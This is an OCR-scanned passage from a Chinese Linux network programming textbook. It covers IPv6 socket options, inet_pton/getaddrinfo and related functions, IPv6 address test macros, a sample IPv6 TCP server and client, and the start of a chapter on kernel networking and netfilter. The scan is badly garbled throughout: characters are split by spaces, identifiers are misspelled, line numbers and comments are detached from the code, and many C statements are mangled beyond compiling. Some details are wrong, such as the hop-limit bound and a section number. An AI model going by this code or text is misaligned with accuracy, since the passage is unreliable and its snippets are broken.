IPV6_ NEXTHOP 和 指定 路 由 的 下 sockaddr in ~ 
IPV6 PKTINFO 表示 接收 分 组 信息 V 
IPV6 RTHDR 表示 接收 源 的 路 径 V 
表示 设 定单 播 外 出 J 


IPV6_UNICAST HOPS 


路 由 跳 限 
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level〈 选 项 级 别 ) optname (选项 名 ) 全 -区 Optval ( 据 类 型 ) 

IPV6 MULTICAST IF 和 人 多 插 包 的 in6_addr 
表示 设 定 多 播 外 出 | . 
IPV6_MULTICAST_HOPS | 多 让 跑 限 int 
: 示 设 置 是 否 使 

IPPROTO IPV6 | IPV6 MULTICAST LOOP Ee a 用 | 5 
IPV6 JOIN GROUP 表示 加 入 多 播 群 组 struct ipv6_mreq 
IPV6 LEAVE GROUP 表示 离开 多 播 群 组 struct ipv6_mreq 


IPV6 ADD MEMBERSHIP | 表示 加 入 多 播 群 组 struct ipv6_mreq 
IPV6_DROP_ MEMBERSHIP | 表示 离开 多 播 群 组 struct ipv6_mreq 


IPPROTO _ICMP6 | ICMP6 FILTER 消息 类 型 icmp6 filter 


表示 传递 的 ICMPv6 


其 含义 如 下 所 述 。 


口 
口 


口 


IPV6_ADDFORM 套 接 字 选 项 : 允许 套 接 字 从 IPv4 向 IPv6 转换 ， 或 者 相反 。 
IPV6_CHECKSUM 套 接 字 选项 : 当 此 选项 为 非 负 值 的 时 候 ，Linux 内 核 将 计算 并 
存储 所 有 发 送 的 数据 分 组 并 对 输入 的 数据 分 组 计算 校 验 和 。 此 选项 不 影响 ICMPv6 
的 原始 套 接 字 接口 。 

IPV6_DSTOPTS 套 接 字 选 项 : 设置 此 选项 将 使 任何 接收 到 的 IPv6 目标 选项 都 由 
recvmsg 作为 辅助 数据 返回 。 

IPV6_HOPLIMIT 套 接 字 选 项 : 设置 此 选项 将 使 任何 接收 到 的 路 由 跳 限 字段 都 由 
recvmsg 作为 辅助 数据 返回 。 

IPV6_HOPOPTS 套 接 字 选 项 : 设置 此 选项 将 使 任何 接收 到 的 路 由 步 跳 选项 都 由 
recvmsg 作为 辅助 数据 返回 。 

IPV6_NEXTHOP 套 接 字 选 项 : 这 是 一 个 函数 类 型 的 选项 ， 给 sendmsg 指定 辅助 数 
据 对 象 的 类 型 ， 指 定 下 一 个 路 由 跳 点 。 

IPV6_PKTINFO 套 接 字 选 项 : 此 选项 的 设置 可 以 使 recvmsg 返回 接收 到 的 IPv6 数 
据 报 的 IPv6 地 址 和 到 达 接 口 索 引 两 个 信息 。 

IPV6_PKTOPTIONS 套 接 字 选 项 : 获取 UDP 套 接 字 的 辅助 数据 。 

IPV6_RTHDR 套 接 字 选 项 : 设置 此 选项 将 使 接收 到 的 IPv6 路 由 头 部 由 recvmsg 作 
IPV6_UNICAST_HOPS 套 接 字 选 项 操作 路 由 跳 限 。 

套 接 字 选 项 IPV6 ADD MEMBERSHIP 、IPV6 DROP MEMBERSHIP 、 
IPV6_JOIN_GROUP 和 IPV6_LEAVE_GROUP 与 IPv4 的 广播 一 样 ， 用 于 向 组 播 中 
加 入 一 个 主机 或 者 从 组 播 中 删除 一 个 主机 。 

ICMPV6_FILTER 套 接 字 选 项 可 以 设置 或 者 获得 一 个 ICMPV6 类 型 的 消息 ， 在 
ICMPV6 中 ， 共 有 256 种 消息 可 以 进行 选择 。 


15.8.2 单 播 跳 限 IPV6_UNICAST_HOPS 
套 接 字 选 项 单 播 跳 限 IPV6_UNICAST_HOPS 用 于 控制 IPv6 外 出 数据 的 跳 限 。 其 设置 
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方式 如 下 : 


int hoplimit = 10; 
if (setsockopt(s, IPPROTO IPV6, IPV6 UNICAST HOPS, (char *) &hoplimit, 
sizeof (hoplimit)) == -1) 

perror ("setsockopt IPV6 UNICAST HOPS"); 


当 使 用 setsockopt() 设 置 了 IPV6_UNICAST_HOPS 的 值 时 ， 之 后 的 过 程 一 直 遵从 这 个 


设置 。 如 果 没 有 设置 这 个 选项 ， 采 用 系统 默认 值 。 跳 限 值 hoplimit 的 含义 如 下 所 述 。 


口 hoplimit < -1: 返回 错误 EINVAL; 

口 hoplimit== -1: 使 用 内 核 默认 值 ; 

口 0<=hoplimit<=255; 采用 用 户 的 值 ; 

口 hoplimit>256: 返回 错误 EINVAL。 

与 设置 跳 限 值 的 方法 相对 应 ， 获 取 跳 限 值 的 方法 如 下 : 

int hoplimit; 

size t len = sizeof (hoplimit); 

if (getsockopt (s, IPPROTO_IPV6, IPV6 UNICAST HOPS, (char*) &hoplimit, &len) 
I St IPV6 UNICAST HOPS"); 


else 
printf ("Using %d for hop limit.\n", hoplimit); 


15.8.3 发送 和 接收 多 播 包 


址 


IPv6 发 送 多 播 的 UDP 包 与 IPv4 有 很 大 的 不 同 , 在 IPv6 协议 中 可 以 指定 发 送 的 多 播 地 

直接 使 用 sendto() 函 数 发 送 。 

设置 和 获取 发 送 多 播 包 的 选项 如 下 所 述 。 

口 IPV6 MULTICAST IF: 设置 发 送 多 播 包 的 网 络 接口 ,参数 为 使 用 中 的 网 络 接口 的 
序号 。 

口 IPV6 MULTICAST HOPS: 设置 发 送 多 播 包 的 跳 限 ， 参 数 的 含义 与 单 播 跳 限 设 置 
选项 的 含义 一 致 。 

口 IPV6 MULTICAST LOOP: 当 多 播 包 发 送 的 对 象 包含 本 地 的 网 络 接口 时 ， 这 个 设 
置 才 有 效 。 此 选项 用 于 设置 当 多 播发 送 到 本 地 时 是 否 将 数据 的 复制 返回 。 参 数 为 1 
时 ， 数 据 会 返回 本 地 ; 为 0 时 ， 不 返回 ; 为 其 他 值 可 能 出 错 。 此 项 的 默认 值 为 发 
送 数 据 返 回 本 地 。 

接收 多 播 的 选项 有 下 面 两 个 ， 当 操作 失败 时 ， 返 回 EOPNOTSUPP。 

口 IPV6 JOIN_ GROUP: 加 入 某 个 多 播 对 象 ， 并 和 某 个 网 络 接口 绑 定 。 当 网 络 接口 序 
号 设置 为 0， 则 内 核 选 定 本 地 网 络 接口 。 例 如 ， 某 些 内 核 在 多 播 对 象 中 查找 IPv6 
的 路 由 ， 以 决定 使 用 的 网 络 接口 。 

口 IPV6_ LEAVE GROUP: 将 某 个 主机 从 群 组 中 取出 ， 取 消 对 其 的 广播 。 

广播 的 选项 参数 为 struct ipv6_mreq， 其 定义 在 头 文件 <netineUin.h> 中 。 

struct ipv6_ mreq { 


struct in6 addr ipv6mr multiaddr; /* IPv6 多 播 地 址 */ 
unsigned int ipvémr interface; /* 接口 索引 */ 
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15.8.4 1IPv6 中 获得 时 间 戳 的 ioctl 命令 


在 IPv4 中 获得 时 间 戳 的 命令 为 SIOCGSTAMP， 返 回 的 是 数据 报到 达 的 时 间 ， 时 间 的 
精度 是 微 秒 ， 在 IPv6 中 新 增加 了 一 个 命令 请 求 SIOCGSTAMPNS， 用 户 返 回 数 据 报 文 到 达 
的 以 纳 秒 为 精度 的 时 间 戳 。 参 数 为 一 个 struct timespec 类 型 的 变量 , 在 头 文件 <Linux/time.h> 
中 定义 ， 如 下 所 示 。 


struct timespec { 
time t tv sec; /* 秒 #/ 
long tv_nsec; /+* 纳 秒 */ 
Hi 


15.9 ”IPvV6 的 库 函 数 


IPv4 与 IPv6 在 某 些 库 函 数 之 间 存 在 差别 ， 主 要 包含 地 址 转换 函数 、 地 址 解析 函数 和 
主机 服务 器 信息 获取 函数 。 在 使 用 这 些 函数 时 ， 要 注意 IPv6 和 IPv4 函数 参数 之 间 的 不 同 
15.9.1 地 址 转换 函数 的 差异 

在 IPv4 协议 族 中 ， 通 常 使 用 函数 inet_nto()、inet_aton() 和 inet addr0) 进 行 十 进 制 字符 
串 和 32 位 的 点 分 4 段 式 网 络 字 节 序 之 间 的 转化 ， 其 原型 如 下 : 


int inet aton(const char *strptr, struct in addr *addrptr); 


/* 字 符 串 转换 为 点 分 四 段 式 */ 
in addr t inet addr(const char * strptr); /* 字 符 串 转换 为 点 分 四 段 式 */ 
char *inet_ntoa(struct in addr inaddr); /* 点 分 四 段 式 的 字符 串 转换 为 十 

进 制 字符 串 */ 


由 于 在 设计 此 类 函数 的 时 候 , 没有 很 好 地 考虑 兼容 性 , 给 IPv6 的 解析 产生 了 困扰 。IPv6 
设计 了 新 的 函数 用 于 完成 文本 表示 的 IPv6 地 址 和 128 位 的 网 络 字 节 序 地 址 之 间 的 相互 
转换 。 

int inet_Pton (int family,const char *strptr,void *addrptr); 

/* 字 符 串 转 128 位 */ 
const char *+inet ntop (int family,const void *+addrptr, char *strptr, size t len); 
/*128 位 转 字符 串 */ 

使 用 pton0) 函 数 和 ntop0 函 数 时 ，family 成 员 需 要 设置 为 AF_INET6，addrptr 为 一 个 
in_addr6 结构 的 变量 。 在 编写 程序 的 时 候 ， 应 该 抛弃 之 前 的 inet_aton0 函 数 和 inet_ntoa() 函 
数 ， 使 用 inet_pton() 和 inet_ntop() 代 符 。 


15.9.2 ”域名 解析 函数 的 差异 
IPv4 通过 下 列 函 数 完成 主机 名 或 域名 到 IPv4 地 址 的 解析 : 


struct hostent *gethostbyname (Const char *hostname); 
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其 中 入 口 参数 hostname 为 主机 名 或 域名 ， 函 数 返 回 的 结果 存放 在 struct hostent[1] 中 。 
IPv6 特 有 的 协议 无 关 的 函数 有 两 个 : getaddrinfo()( 由 名 字 获 得 IP 地 址 ) 和 getnameinfo() 
(由 耳 地 址 获得 名 字 ?， 使 用 它们 几乎 可 以 得 到 所 有 有 关 主 机 的 信息 。 


#include <sys/types.h> 
#include <sys/socket.h> 
#include <netdb.h> 
int getaddrinfo (const char *nodey 
const char *service, 
const struct addrinfo *hints, 
struct addrinfo **res); 
void freeaddrinfo (struct addrinfo *#res); 
const char *gai strerror(int errcode); 


getaddrinfo() 函数 将 之 前 的 getipnodebyname() 函数 、getipnodebyaddr() 函 数 、 
getservbyname() 函 数 和 getservbyport() 函 数 提供 的 功能 结合 在 一 起 ， 提 供 一 个 接口 来 提供 。 
这 个 函数 按照 hints 参 数 输入 的 限制 条 件 , 提供 一 个 或 者 多 个 套 接 字 地 址 结构 供 之 后 的 bind0 
和 connect() 函 数 使 用 。 与 gethostbyname() 函 数 不 能 在 多 个 线程 功能 使 用 的 缺点 相 比较 ， 
getaddrinfo() 函 数 是 线程 安全 的 。 

getaddrinfo() 的 函数 参数 含义 如 下 : 

第 1 个 参数 node 是 一 个 字符 串 指 针 ， 可 以 是 主机 名 地 址 或 实际 IPv4 或 者 IPv6 地 址 。 

第 2 个 参数 service 是 一 个 字符 串 指针 ， 可 以 是 服务 器 名 或 十 进 制 端口 号 。 成 员 node 
和 service 参数 ， 其 中 的 一 个 可 以 为 NULL, 但 是 不 能 都 为 NULL。 它 们 指定 主机 的 网 络 地 
址 或 者 主机 名 称 , 其 将 解析 获得 。 如 果 参 数 hints.ai_flags 设置 为 AL NUMERICHOST 标记 ， 
则 node 的 值 必须 为 一 个 数字 类 型 的 网 络 地 址 。 标 志 AL NUMERICHOST 设 定 任何 长 度 的 
主机 网 络 地 址 。 

第 3 个 参数 hints 相当 于 一 个 过 滤器 ， 只 有 符合 hints 机 构 的 内 容 才 会 返回 到 res 指针 
中 。 当 hints 为 空 时 ， 函 数 假定 ai_flag、ai_socktype 和 ai_protocol 的 值 为 0，ai_familly 的 
值 为 AF_UNSPEC。 

struct addrinfo 结构 的 原型 如 下 : 


struct addrinfo 


int ai flags; 


int ai family; /*PF_xxx 地 址 类 型 */ 

int ai_ socktype; /*SOCK_xxxSOCK 类 型 */ 

int ai protocol; /* 协 议 的 序号 ,为 0 或 者 ITPv4 和 IPv6 协议 中 的 
某 个 协议 ijpproto_xxx*/ 

size t ai addrlen; /*ai_addr 地 址 长 度 */ 

char *ai_ canonname; /* 主 机 名 称 */ 

struct sockaddr *ai addr; /* 地 址 结构 */ 

struct addrinfo *ai next; /* 下 一 个 地 址 结构 */ 


}; 


其 中 的 成 员 ，ai_family、ai_socktype 和 ai_protocol 与 建立 套 接 字 文 件 描述 符 的 socket() 
函数 具有 相同 的 选项 值 。 
参数 hints 中 设置 需要 获得 的 地 址 类 型 ， 即 过 滤 条 件 。 当 hints 为 NULL 的 时 候 ， 获 得 
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所 有 的 网 络 接 口 和 协议 类 型 。 如 果 hints 不 是 NULL， 则 返回 成 员 ai_family、ai_socktype 
和 ai_protocol 设置 的 套 接 字 类 型 地 址 。 参 数 ai_socktype 为 0 或 者 参数 ai_protocol 为 0, 表 
示 返 回 任何 套 接 字 类 型 和 任何 协议 类 型 。 参 数 ai _flags 成 员 可 以 是 符合 值 ， 其 含义 将 在 下 
面 进行 介绍 。 

第 4 个 参数 res 是 一 个 指向 指针 的 指针 ,符合 hints 所 设置 条 件 的 地 址 会 通过 这 个 指针 
传 入 。getaddrinfo() 函 数 返 回 的 是 一 组 所 有 符合 条 件 的 链表 ， 可 以 遍历 整个 链表 后 选择 其 中 

个 使 用 。 

参数 res 中 的 变量 是 动态 申请 内 存 获得 一 个 地 址 链表 ， 并 且 构 成 了 一 个 链表 ， 销 毁 这 
个 链表 需要 使 用 freeaddrinfo() 函 数 。 由 于 主机 可 能 是 多 穴 的 ， 或 者 某 个 服务 对 多 种 协议 类 
型 都 开启 (一 个 SOCK_STREAM 地 址 ， 一 个 SOCK_DGRAM 地 址 )， 所 以 可 能 返回 的 地 
址 是 多 个 。 

getaddrinfo() 函 数 成 功 时 返回 0， 失败 时 返回 如 表 15.12 所 示 的 错误 值 。 


表 15.12 ”函数 getaddrinfo() 的 错误 值 


值 含义 
EAL ADDRFAMILY 网 络 主机 没有 网 络 地 址 
EAL AGAIN 名 称 服务 器 返回 临时 性 错误 ， 稍 后 再 试 
EAI BADFLAGS 参数 ai_flags 包含 错误 的 标志 
EAI FAIL 名 称 服务 器 返回 永久 性 错误 
EAL FAMILY 地 址 中 设置 的 类 型 不 支持 
EAI MEMORY 内 存 不 足 
EAI NODATA 网 络 主机 存在 但 是 没有 指定 地 址 
EAL NONAME 节点 或 者 服务 不 可 知 
EAI SERVICE 请 求 服务 对 应 的 套 接 字 不 支持 
EAL SOCKTYPE 请 求 的 套 接 字 类 型 不 支持 
EAL SYSTEM 其 他 系统 错误 ， 细 节 查 询 ermo 参数 值 


gai_strerror(O) 函 数 将 错误 值 翻译 为 可 读 的 字符 串 。 
除了 getaddrinfo(0) 函 数 ， 还 有 其 他 函数 可 以 获得 主机 的 信息 ， 例 如 getipnodebyname()、 
getipnodebyaddr() 及 freehostent()。 其 原型 如 下 : 


#include <sys/types.h> 

#include <sys/socket.h> 

#include <netdb.h> 

struct hostent *getipnodebyname (const char *namey 
dint afr dnt flagss 
int *error num); 

struct hostent *getipnodebyaddr (const void *addr, 
size t len, int af, 
int *error num); 

void freehostent (struct hostent *#ip); 


其 中 ，struct hostent 结构 原型 如 下 : 


struct hostent { 
char *h_name; 
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char *##h aliases; 
int h_ addrtype; 
pi h length; 

char *#h addr list; 


}; 
上 述 的 函数 是 协议 独立 的 ， 即 对 于 IPv4 协议 和 IPv6 协议 均 适 用 。 
15.9.3 测试 宏 


IPv6 中 有 一 些 用 于 测试 的 宏 ， 以 方便 进行 判断 ， 例 如 判定 是 否 回环 、 是 否 IPv4 地 址 
映射 的 地 址 、 是 否 全 局 的 IPv6 地 址 等 ， 这 些 宏 在 <netinet/in.h> 文 件 中 定义 ， 代 码 如 下 : 


int IN6 IS ADDR UNSPECIFIED (const struct in6 addr *);/* 地 址 没有 指定 ? */ 
int IN6 IS ADDR LOOPBACK (const struct in6 addr *); /* 回 环 接口 */ 
int IN6 IS ADDR MULTICAST (const struct in6 addr *); /* 多 播 地 址 */ 
int IN6 IS ADDR LINKLOCAL (const struct in6 addr *); /* 本 地 IPv6 连接 */ 
int IN6 IS ADDR SITELOCAL (const struct in6 addr *); /* 本 地 IPv6 地址 */ 
int IN6 IS ADDR V4MAPPED (const struct in6 addr *); /*IPv4 映射 地 址 */ 
int IN6 IS ADDR V4COMPAT (const struct in6 addr *); /*IPv4 兼容 地 址 */ 
int IN6 IS ADDR MC NODELOCAL(const struct in6 addr *); 

/* 判 断 多 播 地 址 的 范围 */ 
int IN6 IS ADDR MC LINKLOCAL(const struct in6 addr *); 

/* 多 播 地 址 的 范围 为 1ink 域内 */ 
int IN6 IS ADDR MC SITELOCAL(const struct in6 addr *); 

/** 多 播 地 址 的 范围 为 site 域内 / 
int IN6 IS ADDR MC ORGLOCAL (const struct in6 addr *); 

/* 多 播 地 址 的 范围 为 指定 的 范围 内 */ 
int IN6 IS ADDR MC GLOBAL (const struct in6 addr *); 

/* 多 播 地 址 的 范围 为 全 球 */ 


15.10 ”IPv6 的 编程 的 一 个 简单 例子 


本 节 将 介绍 一 个 简单 的 IPv6 编程 的 例子 ， 演 示 如 何 进 行 IPv6 的 编程 。 通 过 本 节 的 学 
习 可 以 对 IPv6 的 编程 有 一 个 简单 了 解 ， 并 能 够 根据 例子 进行 程序 的 扩展 , 实现 读者 自己 的 
IPv6 程序 。 


15.10.1 服务 器 程序 


IPv6 协议 的 编程 主要 需要 注意 IPv6 地 址 与 IPv4 地 址 的 不 同 ， 以 及 几 个 相关 的 函数 。 
例如 函数 socket(、connect(、send0、\recv0 等 .服务 器 端 建立 套 接 字 并 侦 听 后 , 会 使 用 acceptO 
等 待 客户 端的 连接 。 当 客户 端 成 功 连接 后 ， 将 客户 端的 信息 打印 出 来 ， 然 后 发 送信 息 并 接 
收 客户 端的 信息 ， 最 后 关闭 客户 端 ， 等 待 下 一 个 客户 端 连接 。 服 务 器 端 源 代码 如 下 : 

01 #include <stdio.h> 

02 #include <stdlib.h> 

03 #include <errno.h> 

04 #include <string.h> 


05 #include <sys/types.h> 
06 #include <netinet/in.h> 
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#include <sys/socket.h> 
#include <sys/wait.h> 

#include <unistd.h> 

#include <arpa/inet.h> 

#define BUF LEN 1024 

#define MYPORT 8888 

#define BACKLOG 10 

int main(int argc, char **argv) 


{ 


int s s; 

int gs Cs 
socklen t len; 
int err = -1; 


struct sockaddr in6 local addr; 


struct sockaddr in6 client addr; 
char buf[BUF LEN + 1]; 


s_s = socket(PF INET6, SOCK STREAM, 0); 
if (ss == -1) { 

perror ("socket error"); 

return(1); 
} elsef{ 

printf ("socket() success\n"); 


bzero(&local addr, sizeof (local addr)); 
local addr.sin6 family = PF_INET6; 
local addr.sin6 port = htons (MYPORT); 
local addr.sin6 addr = in6addr any; 


/* 缓 冲 区 长 度 */ 
/* 服 务 器 侦 听 端口 */ 
/* 服 务 器 侦 听 长 度 */ 


/* 服 务 器 端 套 接 字 文件 描述 符 */ 
/* 客 户 端 套 接 字 文 件 描述 符 */ 


/* 本 地 地 址 结构 */ 
/* 客 户 端 地 址 结构 */ 


/* 建 立 IPv6 套 接 字 */ 
/* 判 断 错误 */ 


/* 清 空地 址 结构 */ 
/* 协 议 族 */ 
/* 协 议 端口 */ 
/*IPV6 任意 地 址 */ 


err = bind(s s, (struct sockaddr *) &local addr, sizeof(struct 


sockaddr in6)); 
if (err == -1) { 
perror ("bind error"); 
return (1); 
} else{ 
printf ("bind() success\n"); 
¥ 


err = listen(s_s, BACKLOG); 


if (err == -1) { 
perror ("listen error"); 
exit (1); 

} else{ 


printf ("listen() success\n"); 


while (1) 
{ 
len = sizeof(struct sockaddr); 
/* 等 待 客户 端 连接 */ 
Ss c= acceptl(s s, (struct sockaddr 
df (sc == Tt 
perror ("accept error"); 
return (errno); 
elset 


/* 将 客户 端的 地 址 转换 成 字符 串 */ 


/* 判 断 错误 * / 


/* 设 置 侦 听 队列 */ 
/* 判 断 错误 */ 


/* 地 址 长 度 */ 


*) &client addr, &len); 


/* 判 断 错误 */ 


inet_ntop (AF INET6，&client addr.sin6 addr, buf, sizeof (buf)) 
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printf("a client from ip: %s, port %d, socket %d\n", 
buf， /* 客 户 端 地 址 */ 
client addr.sin6 port， /* 客 户 端 端口 */ 


Sec) /* 客 户 端 套 接 字 文 件 描述 符 */ 
| 
/* 开始 处 理 每 个 新 连接 上 的 数据 收发 */ 
bzero(buf, BUF LEN + 1); /* 清 零 缓冲 区 */ 
strcpy (buf, "From Server"); /* 复 制 数据 */ 


/* 发 消息 给 客户 端 */ 
len = sendl(s c, buf, strlen(buf), 0); 
EE (Lon <0 /* 错 误 信息 */ 
printf ("message '%s' send error,errno:%d,'%s'\n", 
buf, errno, strerror(errno)); 
} else{ /* 成 功 信息 */ 


printf ("message '%s' send success, %dbytes\n",buf, len); 


} 
/* 清 零 缓冲 区 */ 
bzero(buf, BUF LEN + 1); 
/* 接收 客户 端的 消息 */ 
len = recv(s_c, buf, BUF_ LEN, 0); 
i1£ (len > 0) 
printf("recv message success:'%s',%dbytes\n",buf, len); 
else 
printf("recv message failure, errno: %d,'%s'\n",errno, 


strerror (errno)); 


90 
号 
92 
93 
94 
95 


/* 处 理 每 个 新 连接 上 的 数据 收发 结束 */ 


closels c); 


closel(s s); 
return 0; 


15.10.2 ”客户 端 程序 


客户 端 
的 信息 ， 


01 
02 
03 
04 
05 
06 
07 
08 
09 
10 
ia 
2 
13 
14 
bE 
16 
hy) 
18 
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5 服务 器 端的 过 程 类 似 ， 先 3 


立 套 接 字 ， 然 后 客户 端 连接 服务 器 ， 接 收服 务 器 


再 发 送 客户 端的 信息 ， 最 后 关闭 退出 。 客 户 端 源 代码 如 下 : 


#include <stdio.h> 
#include <string.h> 
#include <errno.h> 
#include <sys/socket.h> 
#include <resolv.h> 
#include <stdlib.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <unistd.h> 


#define BUF LEN 1024 /* 缓 冲 区 长 度 */ 
#define MYPORT 8888 /* 服 务 器 侦 听 端口 */ 
#define BACKLOG 10 /* 服 务 器 侦 听 长 度 */ 
int main(int argc, char *argv[]) 
* 
A /* 客 户 端 套 接 字 文件 描述 符 */ 
Socklen t len; 
int err = -1; 
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19 struct sockaddr in6 server addr; /* 本 地 地 址 结构 */ 

20 char buf[BUF LEN + 1]; /* 收 发 缓冲 区 */ 

人 二 

22 s c= socket(PF INET6, SOCK STREAM, 0); /* 建 立 IPv6 套 接 字 */ 
23 Ee = I) t /* 判 断 错误 */ 

24 perror ("socket error"); 

25 return(1); 

26 } elsef{ 

bd printf("socket() success\n"); 

28 } 

29 

30 bzero(&server addr, sizeof(server addr)); /* 清 空地 址 结构 */ 

31 server addr.sin6 family = PF _ INET6; /* 协 议 族 */ 

32 server addr.sin6 port = htons (MYPORT); /* 协 议 端口 */ 

33 server addr.sin6 addr = in6addr any; /*IPV6 任意 地 址 */ 
34 /* 连 接 服务 器 */ 

335 err= connect(s c¢, (struct sockaddr *) g&server addr, sizeof (server addr)); 
36 if (err == -1) { /* 判 断 错误 */ 

3 了 perror ("connect error"); 

38 return (1); 

39 } elsef{ 

40 printf("connect() success\n"); 

41 } 

42 

43 /* 清 零 缓冲 区 */ 

44 bzero(buf, BUF LEN + 1); 

45 len = recv(s c, buf, BUF LEN, 0); /* 接 收服 务 器 数据 */ 
46 /* 打 印信 息 */ 

47 printf ("RECVED %dbytes:%s\n",len,buf); 

48 bzero(buf, BUF LEN + 1); /* 清 零 缓冲 区 */ 

49 strcpy (buf, "From Client"); /* 复 制 客 户 端 的 信息 */ 
50 len = sendl(s c, buf, strlen(buf), 0); /* 向 服务 器 发 送 数 据 */ 
S51 closel(s c); /* 关 闭 套 接 字 */ 

52 

53 return 0; 

54 } 


15.10.3 编译 调试 
将 服务 器 端 保存 到 文件 ipv6_serverc 中 ， 将 客户 端 保存 到 ipv6_client.c 中 。 按 照 如 下 
命令 进行 编译 : 


$gcc -o ipv6 server ipv6 server.c 
$gcc -o ipv6_client ipv6_client.c 


先 运行 服务 器 端的 程序 : 
$./ipv6_ server 

再 运行 客户 端的 程序 : 
$./ipv6 client 

客户 端的 程序 输出 为 : 


Socket () success 


[= = 
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connect() success 
RECVED llbytes:From Server 


服务 器 端的 程序 输出 为 : 


socket() success 

bind() success 

listen() success 

a client from ip: ::8072:78b7:0:0, port 47062, socket 4 
message 'From Server' send success, llbytes 

recv message success:'From Client',l1lbytes 


13.11 处 结 


IPv4 在 使 用 及 网 络 的 发 展 过 程 中 , 逐步 地 暴露 了 一 些 缺 陷 , 例如 安全 性 、 即 插 即 用 等 ， 
特别 是 IP 地 址 的 缺乏 方面 。IPv6 是 下 一 代 网 络 (NGN) 的 一 部 分 ， 主 要 针对 IPv4 的 IP 
地 址 缺乏 ， 并 充分 考虑 到 了 IPv4 的 缺陷 ， 例如 安全 性 、 即 插 即 用 、 简 化 、 服 务 质 量 和 移动 
性 等 。 另 外 ， 本 章 还 对 Linux 操作 系统 中 IPv6 的 程序 设计 进行 了 简单 的 介绍 。 
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第 5 一 15 章 介 绍 了 Linux 环境 下 的 用 户 层 网 络 编程 知识 ， 基 本 上 可 以 满足 应 用 程序 开 
发 的 需要 。 从 本 章 开始 ， 第 16 章 和 第 17 章 将 介绍 Linux 内 核 层 网 络 架构 ， 主 要 介绍 如 何 
基于 netfileter 框架 在 Linux 的 内 核 层 挂 接 自 己 的 网 络 数据 处 理 函 数 ， 对 内 核 层 网 络 数据 进 
行 过 滤 。 本 章 介绍 内 核 层 网 络 架构 的 基本 知识 ， 主 要 包括 以 下 内 容 。 


口 


OOODODO 


内 核 中 网 络 相关 代码 的 基本 情况 : 内 核 层 的 网 络 代码 分 布 情况 ， 内 核 层 的 网 络 处 
理 流程 ， 内 核 层 提供 的 用 户 处 理 网 络 数据 的 可 插入 点 ， 内 核 层 的 数据 结构 及 编程 
框架 等 处 理 内 核 层 网 络 数据 的 基本 技术 ; 

简单 介绍 netfilter 框架 ; 

介绍 Iptables， 如 何 使 用 Iptables 控制 netfilter; 

内 核 层 的 软 中 断 报 文 队列 处 理 方式 ; 

中 断 处 理 下 半 部 的 要 点 和 方式 ; 

与 一 个 socket 有 关 的 数据 如 何在 内 核 层 处 理 。 


16.1 概 述 


Linux 网 络 协议 栈 的 实现 在 内 核 代 码 中 ， 了 解 Linux 内 核 的 网 络 部 分 代码 有 助 于 深刻 
理解 网 络 编程 的 概念 。Linux 内 核 层 还 提供 了 网 络 防 火 墙 的 框架 netfilter， 基 于 netfilter 框 
架 编写 网 络 过 滤 程 序 是 Linux 环境 下 内 核 层 网 络 处 理 的 常用 方法 。 


16.1:1 


代码 目录 分 布 


Linux 的 内 核 源 代码 可 以 从 https://www.kemnel.org/ 网 站 上 下 载 ， 本 书 以 Linux-3.9.5 版 


本 (可 能 


口 


是 最 新 版 本 , 读者 可 以 去 下 载 最 新 的 版 本 ?来 介绍 , 其 代码 目录 结构 参见 图 16.1。 
Documentation: 这 个 目录 下 面 没 有 内 核 的 代码 ， 有 一 套 有 用 的 内 核 文 档 。 其 中 文 
档 质 量 良 劳 不 齐 ， 有 很 多 内 核 文档 的 质量 很 优秀 并 且 相 当 完 整 ， 例 如 文件 系统 ; 
但 是 有 的 则 完全 没有 文档 ， 例 如 进程 调度 。 在 这 个 目录 里 不 时 可 以 发 现 有 用 的 
东西 。 
arch: 此 目录 下 的 所 有 子 目录 的 东西 都 是 体系 结构 特有 的 代码 。 每 个 体系 结构 特有 
的 目录 下 面 至 少 包含 3 个 子 目 录 : kemel， 不 同体 系 结构 内 核 特有 的 实现 方式 ， 如 
信号 量 、 计 时 器 、SMP 等 ; lib, 不 同体 系 结构 下 的 高 性 能 通用 代码 实现 , 如 memcpy 
等 ,， mm， 不 同体 系 结构 特有 的 内 存 管理 程序 的 实现 。 
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arch 


block 


crypto 


Documentation, 


drivers 


firmware 


fs 


include 


| init 


kernel 


lib 


net 


samples 


scripts 


security 


sound 


tools 


usr 


Virt 


图 16.1 Linux 内 核 的 源 代码 结构 
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口 drivers: 内 核 的 驱动 程序 代码 。 此 部 分 的 代码 占 内 核 代 码 的 大 部 分 , 包括 显卡 、 网 
卡 、PCI 等 外 围 设 备 的 驱动 代码 。 

口 fs: 文件 系统 代码 。 包 含 ext2、ext3 、ext4 等 本 地 文件 系统 ，CD-ROM、isofs 等 镜 

像 系统 ， 还 有 NEFS 等 网 络 文件 系统 ， 以 及 proc 等 伪 文 件 系统 。 

include: 此 目录 中 包含 了 Linux 内 核 中 的 大 部 分 头 〈*.h) 文件 。 

init: 内 核 初始 化 过 程 的 代码 。 

ipc: 进程 间 通 信 代 码 。 

kernel: 这 部 分 是 Linux 内 核 中 最 重要 的 ， 包 含 了 内 核 中 平台 无 关 的 基本 功能 ， 主 

要 包含 进程 创建 、 销 毁 和 调度 的 代码 。 

口 lib: 此 目录 中 主要 包含 内 核 中 其 他 模块 使 用 的 通用 函数 和 内 核 自 解压 的 函数 。 

口 mm: 此 目录 中 的 代码 实现 了 平台 无 关 的 内 存 管理 代码 。 

口 scripts: 此 目录 下 是 内 核 配置 时 使 用 的 脚本 ， 当 使 用 make menuconfig 或 者 make 
xconfig 命令 时 ， 会 调用 此 部 分 代码 。 

口 net: 此 目录 中 包含 Linux 内 核 的 网 络 协议 栈 的 代码 。 在 子 目 录 netfilter 下 为 netfilter 
的 实现 代码 ，netfilter 构建 了 一 个 框架 ， 允 许 在 不 重新 编译 内 核 的 情况 下 ， 编 写 可 
加 载 内 核 ， 在 指定 的 地 方 插入 回调 函数 ， 以 用 户 自己 的 方式 处 理 网 络 数据 。 子 目 
录 ipv4 和 ipv6 为 TCP/IP 协议 栈 的 IPv4 和 IPv6 的 实现 ， 主 要 包含 了 TCP、UDP、 
IP 协议 的 代码 ， 还 有 ARP 协议 、ICMP 协议 、IGMP 协议 、netfilter 的 TCP/IP 实 
现 等 代码 实现 ， 以 及 如 proc、ioctl 等 控制 相关 的 代码 。 本 书 的 重点 集中 在 这 个 目 
录 中 的 相关 技术 。 

如 图 16.2 所 示 为 源 代 码 组 织 的 另 一 种 表现 形式 ， 它 映射 到 Linux 代码 的 3 个 内 核 层 。 


net/socket.c net/sysct]_net.c 插口 层 
net/ Netipv*/ net/ethernet bluetooth net/unix 
